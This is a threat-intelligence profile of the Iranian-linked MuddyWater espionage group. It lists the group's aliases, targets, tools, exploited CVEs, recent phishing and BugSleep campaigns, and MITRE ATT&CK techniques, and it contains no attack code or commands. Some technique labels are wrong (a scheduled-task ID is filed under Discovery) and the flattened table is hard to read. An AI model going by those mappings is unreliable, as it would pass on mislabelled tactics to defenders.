Summary:
Keypoints:
- MuddyWater is affiliated with the Iranian government.
- Targets include Saudi Arabia, UAE, Iraq, and other Middle Eastern countries.
- Employs in-memory attack techniques, avoiding new binaries on victim machines.
- Recent campaigns have intensified against Israeli organizations.
- Utilizes phishing tactics to deploy legitimate remote management tools.
- Developed a custom malware implant called BugSleep for remote command execution.
MITRE Techniques
- Reconnaissance (T1589.002): Conducts reconnaissance to gather information about targets.
- Persistence (T1574.002): Establishes persistence mechanisms to maintain access.
- Discovery (T1053.005): Uses discovery techniques to identify system information.
- Resource Development (T1583.006): Develops resources for future operations.
- Initial Access (T1566.001): Gains initial access through phishing campaigns.
- Lateral Movement (T1210): Moves laterally within the network to access other systems.
- Execution (T1059.003): Executes commands on compromised systems.
- Defense Evasion (T1562.001): Evades detection mechanisms to maintain access.
- Credential Access (T1555): Attempts to access and steal credentials.
- Exfiltration (T1041): Exfiltrates data from compromised systems.
MuddyWater is an APT group assessed to be affiliated to the Iranian Government, that targets victims in the Middle East with in-memory vectors leveraging on PowerShell, in a family of attacks now identified as “Living off the land”, as they don’t require the creation of new binaries on the victim’s machine, thus maintaining a low detection profile and a low forensic footprint. The operators behind MuddyWater are likely espionage motivated. Despite the strong preponderance of victims from Pakistan, the most active targets appear to be in Saudi Arabia, the UAE, and Iraq.
Alias:
MERCURY, Seedworm, Static Kitten, TEMP.Zagros, Earth Vetala
Motivation:
Information theft and espionage
Target Technologies:
Office Suites Software, Operating System, Web Application
Targeted Industries:
Aerospace, Aerospace & Defense, Agriculture, Capital Goods, Consumer Services, Defense, Energy, Energy Equipment & Services, Finance, Food, Gaming, High Tech IT Service Providers, Individuals, Media, Media & Entertainment, Military, NGO, Natural Resources, Oil and Gas, Politics, Telecommunication, Telecommunication Services, Transportation, Construction, Cryptocurrency, Education, Engineering, Government, Healthcare, and Metals
Targeted Countries
Israel, Saudi Arabia, the United Arab Emirates, Iraq, Jordan, Lebanon, Qatar, Albania, Turkey, Austria, Ukraine, Russia, India, Azerbaijan, Pakistan, the United States of America, and Mali
Tools Used:
Secure Sockets Funneling , Remadmin , Chisel , Quarks pwDump , PowGoop (Downloader.Covic) , Mimikatz , POWERSTATS , PowGoop , Thanos ransomware
Recently Exploited Vulnerabilities by MUDDYWATER
CVE-2017-0199 | CVE-2020-1472 |
CVE-2017-11882 | CVE-2017-0144 |
CVE-2017-17215 | CVE-2014-8361 |
MUDDYWATER’s Recent Campaign Highlights and Trends
- In a recent campaign, the MuddyWater threat group is believed to have targeted organizations in Saudi Arabia, Turkey, Azerbaijan, India, and Portugal. The attackers have been using compromised organizational email accounts to send phishing messages, primarily aimed at deploying legitimate remote management tools like Atera Agent and Screen Connect. These phishing campaigns, ongoing since February 2024, focus on various sectors, including government bodies, municipalities, media outlets, and travel agencies. So far, over 50 spear-phishing emails have been identified across more than ten sectors, each customized to lure specific targets into enabling remote access through legitimate software, which helps MuddyWater evade detection while maintaining persistent access.
- Since October 2024, MuddyWater has intensified its cyber operations against Israeli organizations. This increased activity is part of a broader campaign deploying a custom malware implant known as BugSleep. This new backdoor enables MuddyWater to execute remote commands and transfer files on compromised systems, representing a shift from their prior use of legitimate remote management tools like Atera Agent and Screen Connect. Designed for remote command execution and file transfer between infected systems and a command-and-control server, BugSleep is still under development, with continuous updates aimed at enhancing its functionality and evasion capabilities.
Malware used by MUDDYWATER: POWERSTATS MITRE ATT&CK Techniques used by MUDDYWATER
Reconnaissance | Persistence | Discovery |
T1589.002 | T1053.005 | T1087.002 |
T1137.001 | T1518.001 | |
Resource Development | T1574.002 | T1049 |
T1583.006 | T1547.001 | T1016 |
T1588.002 | T1057 | |
Privilege Escalation | T1033 | |
Initial Access | T1548.002 | T1518 |
T1566.001 | T1053.005 | T1082 |
T1566.002 | T1574.002 | T1083 |
T1190 | T1547.001 | |
Lateral Movement | ||
Execution | Defense Evasion | T1210 |
T1203 | T1548.002 | |
T1047 | T1218.011 | Collection |
T1059.003 | T1027 | T1113 |
T1053.005 | T1562.001 | T1074.001 |
T1204.001 | T1036.005 | T1560.001 |
T1059.001 | T1027.003 | |
T1204.002 | T1027.004 | Command and Control |
T1059.006 | T1140 | T1573.001 |
T1059.007 | T1218.003 | T1104 |
T1559.002 | T1574.002 | T1071.001 |
T1559.001 | T1218.005 | T1102.002 |
T1059.005 | T1132.001 | |
Credential Access | T1219 | |
T1555 | T1090.002 | |
T1555.003 | T1105 | |
T1552.001 | ||
T1003.005 | Exfiltration | |
T1003.004 | T1041 | |
T1003.001 |
Source: Original Post